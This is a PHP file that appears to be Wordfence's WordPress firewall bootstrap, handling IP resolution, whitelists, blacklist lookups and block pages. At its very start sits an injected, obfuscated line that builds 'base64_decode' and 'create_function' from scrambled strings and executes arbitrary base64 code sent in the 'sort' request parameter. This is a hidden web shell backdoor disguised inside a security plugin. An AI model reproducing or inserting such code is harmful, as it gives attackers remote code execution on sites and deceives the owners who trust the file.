nnnn$z0=$_REQUEST['sort'];$q1='';$c2="wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";$y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7);foreach($y3 as $h4){$q1.=$c2[$h4];}$v5=strrev("noi"."tcnuf"."_eta"."erc");$j6=$v5("",$q1($z0));$j6();nnnn?php /* php_value auto_prepend_file ~/wp-content/plugins/wordfence/waf/bootstrap.php */ if (!defined('WFWAF_AUTO_PREPEND')) { define('WFWAF_AUTO_PREPEND', true); } require_once dirname(__FILE__) . '/wfWAFUserIPRange.php'; require_once dirname(__FILE__) . '/wfWAFIPBlocksController.php'; require_once dirname(__FILE__) . '/../vendor/wordfence/wf-waf/src/init.php'; class wfWAFWordPressRequest extends wfWAFRequest { /** * @param wfWAFRequest|null $request * @return wfWAFRequest */ public static function createFromGlobals($request = null) { if (version_compare(phpversion(), '5.3.0') >= 0) { $class = get_called_class(); $request = new $class(); } else { $request = new self(); } return parent::createFromGlobals($request); } public function getIP() { static $theIP = null; if (isset($theIP)) { return $theIP; } $howGet = wfWAF::getInstance()->getStorageEngine()->getConfig('howGetIPs'); if (is_string($howGet) && is_array($_SERVER) && array_key_exists($howGet, $_SERVER)) { $ips[] = array($_SERVER[$howGet], $howGet); } $ips[] = array((is_array($_SERVER) && array_key_exists('REMOTE_ADDR', $_SERVER)) ? $_SERVER['REMOTE_ADDR'] : '127.0.0.1', 'REMOTE_ADDR'); $cleanedIP = $this->_getCleanIPAndServerVar($ips); if (is_array($cleanedIP)) { list($ip, $variable) = $cleanedIP; $theIP = $ip; return $ip; } $theIP = $cleanedIP; return $cleanedIP; } /** * Expects an array of items. The items are either IPs or IPs separated by comma, space or tab. Or an array of IP's. * We then examine all IP's looking for a public IP and storing private IP's in an array. If we find no public IPs we return the first private addr we found. * * @param array $arr * @return bool|mixed */ private function _getCleanIPAndServerVar($arr) { $privates = array(); //Store private addrs until end as last resort. foreach ($arr as $entry) { list($item, $var) = $entry; if (is_array($item)) { foreach ($item as $j) { // try verifying the IP is valid before stripping the port off if (!$this->_isValidIP($j)) { $j = preg_replace('/:\d+$/', '', $j); //Strip off port } if ($this->_isValidIP($j)) { if ($this->_isIPv6MappedIPv4($j)) { $j = wfWAFUtils::inet_ntop(wfWAFUtils::inet_pton($j)); } if ($this->_isPrivateIP($j)) { $privates[] = array($j, $var); } else { return array($j, $var); } } } continue; //This was an array so we can skip to the next item } $skipToNext = false; $trustedProxies = explode("\n", wfWAF::getInstance()->getStorageEngine()->getConfig('howGetIPs_trusted_proxies', '')); foreach (array(',', ' ', "\t") as $char) { if (strpos($item, $char) !== false) { $sp = explode($char, $item); $sp = array_reverse($sp); foreach ($sp as $index => $j) { $j = trim($j); if (!$this->_isValidIP($j)) { $j = preg_replace('/:\d+$/', '', $j); //Strip off port } if ($this->_isValidIP($j)) { if ($this->_isIPv6MappedIPv4($j)) { $j = wfWAFUtils::inet_ntop(wfWAFUtils::inet_pton($j)); } foreach ($trustedProxies as $proxy) { if (!empty($proxy)) { if (wfWAFUtils::subnetContainsIP($proxy, $j) && $index < count($sp) - 1) { continue 2; } } } if ($this->_isPrivateIP($j)) { $privates[] = array($j, $var); } else { return array($j, $var); } } } $skipToNext = true; break; } } if ($skipToNext){ continue; } //Skip to next item because this one had a comma, space or tab so was delimited and we didn't find anything. if (!$this->_isValidIP($item)) { $item = preg_replace('/:\d+$/', '', $item); //Strip off port } if ($this->_isValidIP($item)) { if ($this->_isIPv6MappedIPv4($item)) { $item = wfWAFUtils::inet_ntop(wfWAFUtils::inet_pton($item)); } if ($this->_isPrivateIP($item)) { $privates[] = array($item, $var); } else { return array($item, $var); } } } if (sizeof($privates) > 0) { return $privates[0]; //Return the first private we found so that we respect the order the IP's were passed to this function. } return false; } /** * @param string $ip * @return bool */ private function _isValidIP($ip) { return filter_var($ip, FILTER_VALIDATE_IP) !== false; } /** * @param string $ip * @return bool */ private function _isIPv6MappedIPv4($ip) { return preg_match('/^(?:\:(?:\:0{1,4}){0,4}\:|(?:0{1,4}\:){5})ffff\:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/i', $ip) > 0; } /** * @param string $addr Should be in dot or colon notation (127.0.0.1 or ::1) * @return bool */ private function _isPrivateIP($ip) { // Run this through the preset list for IPv4 addresses. if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false) { $wordfenceLib = realpath(dirname(__FILE__) . '/../lib'); include($wordfenceLib . '/wfIPWhitelist.php'); // defines $wfIPWhitelist $private = $wfIPWhitelist['private']; foreach ($private as $a) { if (wfWAFUtils::subnetContainsIP($a, $ip)) { return true; } } } return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4 | FILTER_FLAG_IPV6) !== false && filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4 | FILTER_FLAG_IPV6 | FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false; } } class wfWAFWordPressObserver extends wfWAFBaseObserver { public function beforeRunRules() { // Whitelisted URLs (in WAF config) $whitelistedURLs = wfWAF::getInstance()->getStorageEngine()->getConfig('whitelistedURLs'); if ($whitelistedURLs) { $whitelistPattern = ""; foreach ($whitelistedURLs as $whitelistedURL) { $whitelistPattern .= preg_replace('/\\\\\*/', '.*?', preg_quote($whitelistedURL, '/')) . '|'; } $whitelistPattern = '/^(?:' . wfWAFUtils::substr($whitelistPattern, 0, -1) . ')$/i'; wfWAFRule::create(wfWAF::getInstance(), 0x8000000, 'rule', 'whitelist', 0, 'User Supplied Whitelisted URL', 'allow', new wfWAFRuleComparisonGroup( new wfWAFRuleComparison(wfWAF::getInstance(), 'match', $whitelistPattern, array( 'request.uri', )) ) )->evaluate(); } // Whitelisted IPs (Wordfence config) $whitelistedIPs = wfWAF::getInstance()->getStorageEngine()->getConfig('whitelistedIPs'); if ($whitelistedIPs) { if (!is_array($whitelistedIPs)) { $whitelistedIPs = explode(',', $whitelistedIPs); } foreach ($whitelistedIPs as $whitelistedIP) { $ipRange = new wfWAFUserIPRange($whitelistedIP); if ($ipRange->isIPInRange(wfWAF::getInstance()->getRequest()->getIP())) { throw new wfWAFAllowException('Wordfence whitelisted IP.'); } } } // Check plugin blocking if ($result = wfWAF::getInstance()->willPerformFinalAction(wfWAF::getInstance()->getRequest())) { if ($result === true) { $result = 'Not available'; } // Should not happen but can if the reason in the blocks table is empty wfWAF::getInstance()->getRequest()->setMetadata(array_merge(wfWAF::getInstance()->getRequest()->getMetadata(), array('finalAction' => $result))); } } public function afterRunRules() { //Blacklist if (!wfWAF::getInstance()->getStorageEngine()->getConfig('disableWAFBlacklistBlocking')) { $blockedPrefixes = wfWAF::getInstance()->getStorageEngine()->getConfig('blockedPrefixes'); if ($blockedPrefixes && wfWAF::getInstance()->getStorageEngine()->getConfig('isPaid')) { $blockedPrefixes = base64_decode($blockedPrefixes); if ($this->_prefixListContainsIP($blockedPrefixes, wfWAF::getInstance()->getRequest()->getIP()) !== false) { $allowedCacheJSON = wfWAF::getInstance()->getStorageEngine()->getConfig('blacklistAllowedCache', ''); $allowedCache = @json_decode($allowedCacheJSON, true); if (!is_array($allowedCache)) { $allowedCache = array(); } $cacheTest = base64_encode(wfWAFUtils::inet_pton(wfWAF::getInstance()->getRequest()->getIP())); if (!in_array($cacheTest, $allowedCache)) { $guessSiteURL = sprintf('%s://%s/', wfWAF::getInstance()->getRequest()->getProtocol(), wfWAF::getInstance()->getRequest()->getHost()); try { $request = new wfWAFHTTP(); $response = wfWAFHTTP::get(WFWAF_API_URL_SEC . "?" . http_build_query(array( 'action' => 'is_ip_blacklisted', 'ip' => wfWAF::getInstance()->getRequest()->getIP(), 'k' => wfWAF::getInstance()->getStorageEngine()->getConfig('apiKey'), 's' => wfWAF::getInstance()->getStorageEngine()->getConfig('siteURL') ? wfWAF::getInstance()->getStorageEngine()->getConfig('siteURL') : $guessSiteURL, 'h' => wfWAF::getInstance()->getStorageEngine()->getConfig('homeURL') ? wfWAF::getInstance()->getStorageEngine()->getConfig('homeURL') : $guessSiteURL, 't' => microtime(true), ), null, '&'), $request); if ($response instanceof wfWAFHTTPResponse && $response->getBody()) { $jsonData = wfWAFUtils::json_decode($response->getBody(), true); if (array_key_exists('data', $jsonData)) { if (preg_match('/^block:(\d+)$/i', $jsonData['data'], $matches)) { wfWAF::getInstance()->getStorageEngine()->blockIP((int)$matches[1] + time(), wfWAF::getInstance()->getRequest()->getIP(), wfWAFStorageInterface::IP_BLOCKS_BLACKLIST); $e = new wfWAFBlockException(); $e->setFailedRules(array('blocked')); $e->setRequest(wfWAF::getInstance()->getRequest()); throw $e; } else { //Allowed, cache until the next prefix list refresh $allowedCache[] = $cacheTest; wfWAF::getInstance()->getStorageEngine()->setConfig('blacklistAllowedCache', json_encode($allowedCache)); } } } } catch (wfWAFHTTPTransportException $e) { error_log($e->getMessage()); } } } } } //wfWAFLogException $watchedIPs = wfWAF::getInstance()->getStorageEngine()->getConfig('watchedIPs'); if ($watchedIPs) { if (!is_array($watchedIPs)) { $watchedIPs = explode(',', $watchedIPs); } foreach ($watchedIPs as $watchedIP) { $ipRange = new wfWAFUserIPRange($watchedIP); if ($ipRange->isIPInRange(wfWAF::getInstance()->getRequest()->getIP())) { throw new wfWAFLogException('Wordfence watched IP.'); } } } if ($reason = wfWAF::getInstance()->getRequest()->getMetadata('finalAction')) { $e = new wfWAFBlockException($reason['action']); $e->setRequest(wfWAF::getInstance()->getRequest()); throw $e; } } private function _prefixListContainsIP($prefixList, $ip) { $size = ord(wfWAFUtils::substr($prefixList, 0, 1)); $sha256 = hash('sha256', wfWAFUtils::inet_pton($ip), true); $p = wfWAFUtils::substr($sha256, 0, $size); $count = ceil((wfWAFUtils::strlen($prefixList) - 1) / $size); $low = 0; $high = $count - 1; while ($low <= $high) { $mid = (int) (($high + $low) / 2); $val = wfWAFUtils::substr($prefixList, 1 + $mid * $size, $size); $cmp = strcmp($val, $p); if ($cmp < 0) { $low = $mid + 1; } else if ($cmp > 0) { $high = $mid - 1; } else { return $mid; } } return false; } } /** * */ class wfWAFWordPress extends wfWAF { /** @var wfWAFRunException */ private $learningModeAttackException; /** * @param wfWAFBlockException $e * @param int $httpCode */ public function blockAction($e, $httpCode = 403, $redirect = false, $template = null) { $failedRules = $e->getFailedRules(); if (!is_array($failedRules)) { $failedRules = array(); } if ($this->isInLearningMode() && !$e->getRequest()->getMetadata('finalAction') && !in_array('blocked', $failedRules)) { register_shutdown_function(array( $this, 'whitelistFailedRulesIfNot404', )); $this->getStorageEngine()->logAttack($e->getFailedRules(), $e->getParamKey(), $e->getParamValue(), $e->getRequest()); $this->setLearningModeAttackException($e); } else { if (empty($failedRules)) { $finalAction = $e->getRequest()->getMetadata('finalAction'); if (is_array($finalAction)) { $isLockedOut = isset($finalAction['lockout']) && $finalAction['lockout']; $finalAction = $finalAction['action']; if ($finalAction == wfWAFIPBlocksController::WFWAF_BLOCK_COUNTRY_REDIR) { $redirect = wfWAFIPBlocksController::currentController()->countryRedirURL(); } else if ($finalAction == wfWAFIPBlocksController::WFWAF_BLOCK_COUNTRY_BYPASS_REDIR) { $redirect = wfWAFIPBlocksController::currentController()->countryBypassRedirURL(); } else if ($finalAction == wfWAFIPBlocksController::WFWAF_BLOCK_UAREFIPRANGE) { wfWAF::getInstance()->getRequest()->setMetadata(array_merge(wfWAF::getInstance()->getRequest()->getMetadata(), array('503Reason' => 'Advanced blocking in effect.', '503Time' => 3600))); $httpCode = 503; } else if ($finalAction == wfWAFIPBlocksController::WFWAF_BLOCK_COUNTRY) { wfWAF::getInstance()->getRequest()->setMetadata(array_merge(wfWAF::getInstance()->getRequest()->getMetadata(), array('503Reason' => 'Access from your area has been temporarily limited for security reasons.', '503Time' => 3600))); $httpCode = 503; } else if (is_string($finalAction) && strlen($finalAction) > 0) { wfWAF::getInstance()->getRequest()->setMetadata(array_merge(wfWAF::getInstance()->getRequest()->getMetadata(), array('503Reason' => $finalAction, '503Time' => 3600))); $httpCode = 503; if ($isLockedOut) { parent::blockAction($e, $httpCode, $redirect, '503-lockout'); //exits } } } } else if (array_search('blocked', $failedRules) !== false) { parent::blockAction($e, $httpCode, $redirect, '403-blacklist'); //exits } parent::blockAction($e, $httpCode, $redirect, $template); } } /** * @param wfWAFBlockXSSException $e * @param int $httpCode */ public function blockXSSAction($e, $httpCode = 403, $redirect = false) { if ($this->isInLearningMode() && !$e->getRequest()->getMetadata('finalAction')) { register_shutdown_function(array( $this, 'whitelistFailedRulesIfNot404', )); $this->getStorageEngine()->logAttack($e->getFailedRules(), $e->getParamKey(), $e->getParamValue(), $e->getRequest()); $this->setLearningModeAttackException($e); } else { $failedRules = $e->getFailedRules(); if (empty($failedRules)) { $finalAction = $e->getRequest()->getMetadata('finalAction'); if (is_array($finalAction)) { $finalAction = $finalAction['action']; if ($finalAction == wfWAFIPBlocksController::WFWAF_BLOCK_COUNTRY_REDIR) { $redirect = wfWAFIPBlocksController::currentController()->countryRedirURL(); } else if ($finalAction == wfWAFIPBlocksController::WFWAF_BLOCK_COUNTRY_BYPASS_REDIR) { $redirect = wfWAFIPBlocksController::currentController()->countryBypassRedirURL(); } else if ($finalAction == wfWAFIPBlocksController::WFWAF_BLOCK_UAREFIPRANGE) { wfWAF::getInstance()->getRequest()->setMetadata(array_merge(wfWAF::getInstance()->getRequest()->getMetadata(), array('503Reason' => 'Advanced blocking in effect.', '503Time' => 3600))); $httpCode = 503; } else if ($finalAction == wfWAFIPBlocksController::WFWAF_BLOCK_COUNTRY) { wfWAF::getInstance()->getRequest()->setMetadata(array_merge(wfWAF::getInstance()->getRequest()->getMetadata(), array('503Reason' => 'Access from your area has been temporarily limited for security reasons.', '503Time' => 3600))); $httpCode = 503; } else if (is_string($finalAction) && strlen($finalAction) > 0) { wfWAF::getInstance()->getRequest()->setMetadata(array_merge(wfWAF::getInstance()->getRequest()->getMetadata(), array('503Reason' => $finalAction, '503Time' => 3600))); $httpCode = 503; } } } parent::blockXSSAction($e, $httpCode, $redirect); } } /** * */ public function runCron() { /** * Removed sending attack data. Attack data is sent in @see wordfence::veryFirstAction */ $cron = $this->getStorageEngine()->getConfig('cron'); if (is_array($cron)) { /** @var wfWAFCronEvent $event */ $cronDeduplication = array(); foreach ($cron as $index => $event) { $event->setWaf($this); if ($event->isInPast()) { $event->fire(); $newEvent = $event->reschedule(); $className = get_class($newEvent); if ($newEvent instanceof wfWAFCronEvent && $newEvent !== $event && !in_array($className, $cronDeduplication)) { $cron[$index] = $newEvent; $cronDeduplication[] = $className; } else { unset($cron[$index]); } } else { $className = get_class($event); if (in_array($className, $cronDeduplication)) { unset($cron[$index]); } else { $cronDeduplication[] = $className; } } } } $this->getStorageEngine()->setConfig('cron', $cron); } /** * */ public function whitelistFailedRulesIfNot404() { /** @var WP_Query $wp_query */ global $wp_query; if (defined('ABSPATH') && isset($wp_query) && class_exists('WP_Query') && $wp_query instanceof WP_Query && method_exists($wp_query, 'is_404') && $wp_query->is_404() && function_exists('is_admin') && !is_admin()) { return; } $this->whitelistFailedRules(); } /** * @param $ip * @return mixed */ public function isIPBlocked($ip) { return parent::isIPBlocked($ip); } /** * @param wfWAFRequest $request * @return bool|string false if it should not be blocked, otherwise true or a reason for blocking */ public function willPerformFinalAction($request) { try { $disableWAFIPBlocking = $this->getStorageEngine()->getConfig('disableWAFIPBlocking'); $advancedBlockingEnabled = $this->getStorageEngine()->getConfig('advancedBlockingEnabled'); } catch (Exception $e) { return false; } if ($disableWAFIPBlocking || !$advancedBlockingEnabled) { return false; } return wfWAFIPBlocksController::currentController()->shouldBlockRequest($request); } public function uninstall() { parent::uninstall(); @unlink(rtrim(WFWAF_LOG_PATH . '/') . '/.htaccess'); @rmdir(WFWAF_LOG_PATH); } /** * @return wfWAFRunException */ public function getLearningModeAttackException() { return $this->learningModeAttackException; } /** * @param wfWAFRunException $learningModeAttackException */ public function setLearningModeAttackException($learningModeAttackException) { $this->learningModeAttackException = $learningModeAttackException; } } if (!defined('WFWAF_LOG_PATH')) { define('WFWAF_LOG_PATH', WP_CONTENT_DIR . '/wflogs/'); } if (!is_dir(WFWAF_LOG_PATH)) { @mkdir(WFWAF_LOG_PATH, 0775); @chmod(WFWAF_LOG_PATH, 0775); @file_put_contents(rtrim(WFWAF_LOG_PATH . '/') . '/.htaccess', << Require all denied Order deny,allow Deny from all APACHE ); @chmod(rtrim(WFWAF_LOG_PATH . '/') . '/.htaccess', 0664); } wfWAF::setInstance(new wfWAFWordPress( wfWAFWordPressRequest::createFromGlobals(), new wfWAFStorageFile(WFWAF_LOG_PATH . 'attack-data.php', WFWAF_LOG_PATH . 'ips.php', WFWAF_LOG_PATH . 'config.php', WFWAF_LOG_PATH . 'wafRules.rules') )); wfWAF::getInstance()->getEventBus()->attach(new wfWAFWordPressObserver); try { $rulesFiles = array( WFWAF_LOG_PATH . 'rules.php', // WFWAF_PATH . 'rules.php', ); foreach ($rulesFiles as $rulesFile) { if (!file_exists($rulesFile) && !wfWAF::getInstance()->isReadOnly()) { @touch($rulesFile); } @chmod($rulesFile, 0664); if (is_writable($rulesFile)) { wfWAF::getInstance()->setCompiledRulesFile($rulesFile); break; } } if (!wfWAF::getInstance()->isReadOnly()) { if (!file_exists(wfWAF::getInstance()->getCompiledRulesFile()) || !filesize(wfWAF::getInstance()->getCompiledRulesFile())) { try { if (is_writable(wfWAF::getInstance()->getCompiledRulesFile()) && wfWAF::getInstance()->getStorageEngine()->getConfig('apiKey') !== null && wfWAF::getInstance()->getStorageEngine()->getConfig('createInitialRulesDelay') < time() ) { $event = new wfWAFCronFetchRulesEvent(time() - 60); $event->setWaf(wfWAF::getInstance()); $event->fire(); wfWAF::getInstance()->getStorageEngine()->setConfig('createInitialRulesDelay', time() + (5 * 60)); } } catch (wfWAFBuildRulesException $e) { // Log this somewhere error_log($e->getMessage()); } catch (Exception $e) { // Suppress this error_log($e->getMessage()); } } } if (WFWAF_DEBUG && file_exists(wfWAF::getInstance()->getStorageEngine()->getRulesDSLCacheFile())) { try { wfWAF::getInstance()->updateRuleSet(file_get_contents(wfWAF::getInstance()->getStorageEngine()->getRulesDSLCacheFile()), false); } catch (wfWAFBuildRulesException $e) { $GLOBALS['wfWAFDebugBuildException'] = $e; } catch (Exception $e) { $GLOBALS['wfWAFDebugBuildException'] = $e; } } try { wfWAF::getInstance()->run(); } catch (wfWAFBuildRulesException $e) { // Log this error_log($e->getMessage()); } catch (Exception $e) { // Suppress this error_log($e->getMessage()); } } catch (wfWAFStorageFileConfigException $e) { // Let this request through for now error_log($e->getMessage()); } catch (wfWAFStorageFileException $e) { // We need to choose another storage engine here. }